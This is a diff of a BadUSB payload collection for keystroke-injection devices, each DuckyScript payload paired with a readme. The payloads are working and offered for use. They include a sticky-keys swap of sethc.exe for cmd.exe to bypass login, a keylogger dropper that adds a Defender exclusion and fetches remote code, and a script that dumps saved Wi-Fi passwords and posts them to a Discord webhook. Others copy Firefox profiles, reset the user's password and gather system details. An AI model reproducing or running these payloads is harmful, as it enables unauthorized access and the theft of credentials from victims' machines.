     39 +## Meta
     40 +
     41 +
     42 +- If you want to sponsor me on Patreon, the link is on my profile.
     43 +
     44 +
     45 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/StartWifiAccessPoint/StartWifiAccessPoint.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Connect to a Wifi (example Evil Twin) to sniff packets or what you wanna do.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 1200
     16 +ALT y
     17 +DELAY 1200
     18 +GUI UP
     19 +DELAY 1200
     20 +STRING netsh wlan set hostednetwork ssid=WLAN NAME key=PASSWORD;netsh wlan start hostednetwork; exit
     21 +ENTER
     22 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/StartWifiAccessPoint/readme.md
     1 +
     2 +# StartWifiAccessPoint
     3 +
     4 +This script sets up a hosted wireless network on a computer running Windows.
     5 +
     6 +
     7 +## How to use?
     8 +
     9 +This script is not plug and play. You will have to do the following changes:
     10 +
     11 +- choose name of wifi "ssid=WLAN NAME"
     12 +- choose password of the wifi "key=PASSWORD"
     13 +
     14 +
     15 +## Features
     16 +
     17 +- open powershell
     18 +- create new wifi by ssid
     19 +- set password for wifi
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Feedback
     26 +
     27 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +
     34 +## Support
     35 +
     36 +For support, contact me via Discord "UNC0V3R3D#8662".
     37 +
     38 +
     39 +## Meta
     40 +
     41 +
     42 +- If you want to sponsor me on Patreon, the link is on my profile.
     43 +
     44 +
     45 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/StickyKeysSWAP/StickyKeysSWAP.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Switch cmd.exe with sethc.exe, allowing to get access to target pc without knowing the pin.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 1500
     16 +ALT y
     17 +DELAY 1500
     18 +GUI UP
     19 +DELAY 1500
     20 +STRING copy c:\windows\system32\sethc.exe c:\;$acl = Get-Acl c:\windows\system32\sethc.exe;$AccessRule1 = New-Object System.Security.AccessControl.FileSystemAccessRule("Jeder","FullControl","Allow");$AccessRule2 = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone","FullControl","Allow");$acl.SetAccessRule($AccessRule1);$acl | Set-Acl c:\windows\system32\sethc.exe;$acl.SetAccessRule($AccessRule2);$acl | Set-Acl c:\windows\system32\sethc.exe;Copy-Item -Path c:\windows\system32\cmd.exe -Destination c:\windows\system32\sethc.exe -Recurse -force; exit
     21 +ENTER
     22 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/StickyKeysSWAP/readme.md
     1 +
     2 +# StickyKeysSWAP
     3 +
     4 +This script modifies the system file "sethc.exe" on a computer running Windows by adding full control access rules for "Everyone", replacing the file with the "cmd.exe" file, and setting the access control list of the file to the modified access control list.
     5 +
     6 +## How to use?
     7 +
     8 +This script is plug and play. Just plug in the Flipper and run the script.
     9 +
     10 +
     11 +## Features
     12 +
     13 +- open powershell
     14 +- replace cmd.exe
     15 +
     16 +
     17 +
     18 +## Feedback
     19 +
     20 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +## Support
     28 +
     29 +For support, contact me via Discord "UNC0V3R3D#8662".
     30 +
     31 +
     32 +## Meta
     33 +
     34 +
     35 +- If you want to sponsor me on Patreon, the link is on my profile.
     36 +
     37 +
     38 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/setWinPass/readme.md
     1 +
     2 +# setWinPass
     3 +
     4 +This script sets the password for the current user on windows.
     5 +
     6 +
     7 +## How to use?
     8 +
     9 +This script is not plug and play. You will have to do the following changes:
     10 +
     11 +- change password to anything you like "$NewPassword = ConvertTo-SecureString "PASSWORD HERE""
     12 +
     13 +
     14 +## Features
     15 +
     16 +- open powershell
     17 +- find current username
     18 +- set new password for current user
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +## Feedback
     25 +
     26 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     27 +
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +## Support
     34 +
     35 +For support, contact me via Discord "UNC0V3R3D#8662".
     36 +
     37 +
     38 +## Meta
     39 +
     40 +
     41 +- If you want to sponsor me on Patreon, the link is on my profile.
     42 +
     43 +
     44 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/setWinPass/setWinPass.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Change Widnows 10 user password.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 560
     17 +STRING $User = ([Environment]::UserName)
     18 +DELAY 200
     19 +ENTER
     20 +DELAY 500
     21 +STRING $NewPassword = ConvertTo-SecureString "PASSWORD HERE" -AsPlainText -Force
     22 +DELAY 300
     23 +ENTER
     24 +DELAY 500
     25 +STRING Set-LocalUser -Name $User -Password $NewPassword
     26 +DELAY 300
     27 +ENTER
     28 +DELAY 600
     29 +exit
     30 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/ExfilFirefox/ExfilFirefox.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Exfiltrate Firefox profile and store to path. Change destination Path at the very end of the string.
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 1200
     16 +ALT y
     17 +DELAY 1200
     18 +GUI UP
     19 +DELAY 1200
     20 +STRING $ErrorActionPreference = "SilentlyContinue";$folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-26528702.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$fireSaveDir = New-Item $userDir'\WGD\FireFox-Profile' -ItemType Directory;$fireDir = (Get-ChildItem env:userprofile).value + '\AppData\Roaming\Mozilla\Firefox\Profiles';Copy-Item $fireDir -Destination $fireSaveDir -Recurse;Start-Sleep -s 10;$Report >> $fileSaveDir'/ComputerInfo-26528702.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-26528702.zip ; exit
     21 +ENTER
     22 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/ExfilFirefox/readme.md
     1 +
     2 +# ExfilFirefox
     3 +This script exfiltrates the firefox profile and saves them to a local html file.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change path of the file "-DestinationPath PATH\results-26528702.zip"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- copy firefox profile
     16 +- paste profile into a html file
     17 +
     18 +
     19 +
     20 +## Feedback
     21 +
     22 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +
     29 +## Support
     30 +
     31 +For support, contact me via Discord "UNC0V3R3D#8662".
     32 +
     33 +
     34 +## Meta
     35 +
     36 +
     37 +- If you want to sponsor me on Patreon, the link is on my profile.
     38 +
     39 +
     40 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/General_PC_Information/General_PC_Information.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Saves some general Information about the target pc to a file.
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 900
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime; $fileSaveDir = New-Item ($userDir) -ItemType Directory; $date = get-date; $style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>'; $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-34231960.html'; $Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"; $SysBootTime = Get-WmiObject Win32_OperatingSystem; $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime; $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME); $SerialNo = $SysSerialNo.SerialNumber; $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model; $SysManufacturer = $SysInfo.Manufacturer; $SysModel = $SysInfo.Model; $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption; $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"; $HD = [math]::truncate($disk.Size / 1GB); $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB); $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize; $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB); $SysCpu = Get-WmiObject Win32_Processor | Select Name; $Cpu = $SysCpu.Name; $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber; $HardSerialNo = $HardSerial.SerialNumber; $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name; $graphicsCard = gwmi win32_VideoController |select Name; $graphics = $graphicsCard.Name; $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1; $DriveLetter = $CDDrive.Drive; $DriveName = $CDDrive.Caption; $Disk = $DriveLetter + '\' + $DriveName; $Firewall = New-Object -com HNetCfg.FwMgr; $FireProfile = $Firewall.LocalPolicy.CurrentProfile; $FireProfile = $FireProfile.FirewallEnabled; $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"; $Report >> $fileSaveDir'/ComputerInfo-34231960.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip ; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/General_PC_Information/readme.md
     1 +
     2 +# General_PC_Information
     3 +This script saves some general info about the pc into a file.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change path of the file "-DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- exfiltrate pc info
     16 +- paste info to a html file
     17 +
     18 +
     19 +
     20 +## Feedback
     21 +
     22 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +
     29 +## Support
     30 +
     31 +For support, contact me via Discord "UNC0V3R3D#8662".
     32 +
     33 +
     34 +## Meta
     35 +
     36 +
     37 +- If you want to sponsor me on Patreon, the link is on my profile.
     38 +
     39 +
     40 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/GetAllComputerInfo/GetAllComputerInfo.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Simple Powershell script that stores alot of Info about the PC into a file. For more info read the comments (REM) in the code below.
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 1000
     6 +GUI r
     7 +DELAY 450
     8 +REM Start Powershell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 500
     11 +ENTER
     12 +DELAY 600
     13 +LEFTARROW
     14 +DELAY 600
     15 +ENTER
     16 +DELAY 750
     17 +REM Change the "Path" to your path ("C:\...").
     18 +STRING $Path = "PATH"
     19 +DELAY 500
     20 +ENTER
     21 +DELAY 500
     22 +REM Creates the Results.txt file to the path
     23 +STRING New-Item -Path "$Path\Results.txt" -ItemType File
     24 +DELAY 500
     25 +ENTER
     26 +DELAY 700
     27 +REM Gets all the Info about the PC and stores them into the created Results.txt file
     28 +STRING Get-ComputerInfo | Out-File -FilePath "$Path\Results.txt"
     29 +DELAY 300
     30 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/GetAllComputerInfo/readme.md
     1 +
     2 +# GetAllComputerInfo
     3 +This script saves almost every valuable info about the pc to a file.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change path of the file "STRING $Path = "PATH""
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- exfiltrate pc info
     16 +- paste info to a html file
     17 +
     18 +
     19 +
     20 +## Feedback
     21 +
     22 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +
     29 +## Support
     30 +
     31 +For support, contact me via Discord "UNC0V3R3D#8662".
     32 +
     33 +
     34 +## Meta
     35 +
     36 +
     37 +- If you want to sponsor me on Patreon, the link is on my profile.
     38 +
     39 +
     40 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/IP_To_Discord/SaveIP_ToDiscordWebhook.txt
     1 +REM Author: Startrk1995
     2 +REM Description: Saves the IP of the target pc to a discord webhook.
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 200
     8 +STRING powershell
     9 +ENTER
     10 +DELAY 1000
     11 +STRING $url="DISCORD WEBHOOK LINK";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "[email protected]" $url ; Remove-Item '.\stats.txt';exit
     12 +ENTER
     13 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/IP_To_Discord/readme.md
     1 +
     2 +# IP_To_Discord
     3 +Saves the IP of the target pc to a discord webhook.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change the url of the discord webhook "$url="DISCORD WEBHOOK LINK""
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- get ip adress
     16 +- send file with ip to webhook
     17 +
     18 +
     19 +
     20 +## Feedback
     21 +
     22 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +
     29 +## Support
     30 +
     31 +For support, contact me via Discord "UNC0V3R3D#8662".
     32 +
     33 +
     34 +## Meta
     35 +
     36 +
     37 +- If you want to sponsor me on Patreon, the link is on my profile.
     38 +
     39 +
     40 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/Keylogger/Keylogger.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: This script allows you to inject a software keylogger in victim's PC
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 2500
     6 +GUI d
     7 +DELAY 500
     8 +GUI r
     9 +DELAY 500
     10 +STRING powershell.exe -windowstyle hidden
     11 +DELAY 200
     12 +CTRL SHIFT ENTER
     13 +DELAY 5000
     14 +LEFT
     15 +DELAY 150
     16 +ENTER
     17 +DELAY 5000
     18 +STRING cd C:\Users\Public\Documents
     19 +ENTER
     20 +STRING Add-MpPreference -ExclusionExtension ps1 -Force
     21 +ENTER
     22 +STRING Set-ExecutionPolicy unrestricted -Force
     23 +ENTER
     24 +STRING wget (LINK TO KEYLOGGER) -OutFile script.ps1
     25 +ENTER
     26 +DELAY 3500
     27 +STRING powershell.exe -noexit -windowstyle hidden -file script.ps1
     28 +ENTER
     29 +CAPSLOCK
     30 +DELAY 150
     31 +CAPSLOCK
     32 +DELAY 150
     33 +CAPSLOCK
     34 +DELAY 150
     35 +CAPSLOCK
     36 +DELAY 2000
     37 +CAPSLOCK
     38 +DELAY 150
     39 +CAPSLOCK
     40 +DELAY 150
     41 +CAPSLOCK
     42 +DELAY 150
     43 +CAPSLOCK
     44 +REM End of payload
     45 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/Keylogger/readme.md
     1 +
     2 +# Keylogger
     3 +This script is only for experienced penetration testers.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change url to a .ps keylogger script "STRING wget (LINK TO KEYLOGGER)"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- download .ps script
     16 +- execute script
     17 +
     18 +
     19 +
     20 +## Feedback
     21 +
     22 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +
     29 +## Support
     30 +
     31 +For support, contact me via Discord "UNC0V3R3D#8662".
     32 +
     33 +
     34 +## Meta
     35 +
     36 +
     37 +- If you want to sponsor me on Patreon, the link is on my profile.
     38 +
     39 +
     40 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/ListWindowsUpdates/ListWindowsUpdates.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Saves all installed windows updates to a list. Don't forget to change the path.
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 1200
     16 +ALT y
     17 +DELAY 1200
     18 +GUI UP
     19 +DELAY 1200
     20 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-90412137.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=center><h3> Installed Updates</h3>';$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy);$Report = $Report + '</div>';$Report >> $fileSaveDir'/ComputerInfo-90412137.html'
     21 +ENTER
     22 +STRING Compress-Archive -Path $fileSaveDir -DestinationPath results-90412137.zip ; exit
     23 +ENTER
     24 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/ListWindowsUpdates/readme.md
     1 +
     2 +# ListWindowsUpdates
     3 +This script is going to save the names of installed windows updates.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change path for the file "-DestinationPath results-90412137.zip"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- list windows updates
     16 +- store them into a file
     17 +
     18 +
     19 +
     20 +## Feedback
     21 +
     22 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +
     29 +## Support
     30 +
     31 +For support, contact me via Discord "UNC0V3R3D#8662".
     32 +
     33 +
     34 +## Meta
     35 +
     36 +
     37 +- If you want to sponsor me on Patreon, the link is on my profile.
     38 +
     39 +
     40 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/SAMexfil/SAMexfil.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Extracts Security Account Manager of the PC to a file.
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 1200
     16 +ALT y
     17 +DELAY 1200
     18 +GUI UP
     19 +DELAY 1200
     20 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-61748762.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>';$Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path);$Report = $Report + '</div>';$Report >> $fileSaveDir'/ComputerInfo-61748762.html'
     21 +ENTER
     22 +STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-61748762.zip ; exit
     23 +ENTER
     24 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/SAMexfil/readme.md
     1 +
     2 +# SAMexfil
     3 +This script extracts the Security Account Manager (SAM) of the PC and saves it to a file.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You need to do the following changes:
     8 +
     9 +- change path for the file "-DestinationPath PATH\results-61748762.zip"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- copy SAM profile
     16 +- store it to a file
     17 +
     18 +
     19 +
     20 +## Feedback
     21 +
     22 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +
     29 +## Support
     30 +
     31 +For support, contact me via Discord "UNC0V3R3D#8662".
     32 +
     33 +
     34 +## Meta
     35 +
     36 +
     37 +- If you want to sponsor me on Patreon, the link is on my profile.
     38 +
     39 +
     40 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/USB_And_Harddrive_Information.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
     3 +REM Version: 1.0
     4 +REM Category: Exfiltration
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 900
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +GUI UP
     19 +DELAY 900
     20 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>';$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-68597243.html';$Report = $Report + '<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>';$u = 0;$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace);$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'
     21 +ENTER
     22 +STRING do {
     23 +ENTER
     24 +STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
     25 +ENTER
     26 +STRING $Report = $Report + '<tr><td>Drive Name: </td><td>' + $allUsb[$u].Name + $allUsb[$u].Label + '</td><td>Free Space: </td><td>' + $gbUSB + 'GB</td></tr>'
     27 +ENTER
     28 +STRING Write-Output $fullUSB
     29 +ENTER
     30 +STRING $u ++
     31 +ENTER
     32 +STRING } while ($u -lt $allUsb.Count)
     33 +ENTER
     34 +STRING $Report = $Report + '</table></div>'
     35 +ENTER
     36 +STRING $Report >> $fileSaveDir'/ComputerInfo-68597243.html'
     37 +ENTER
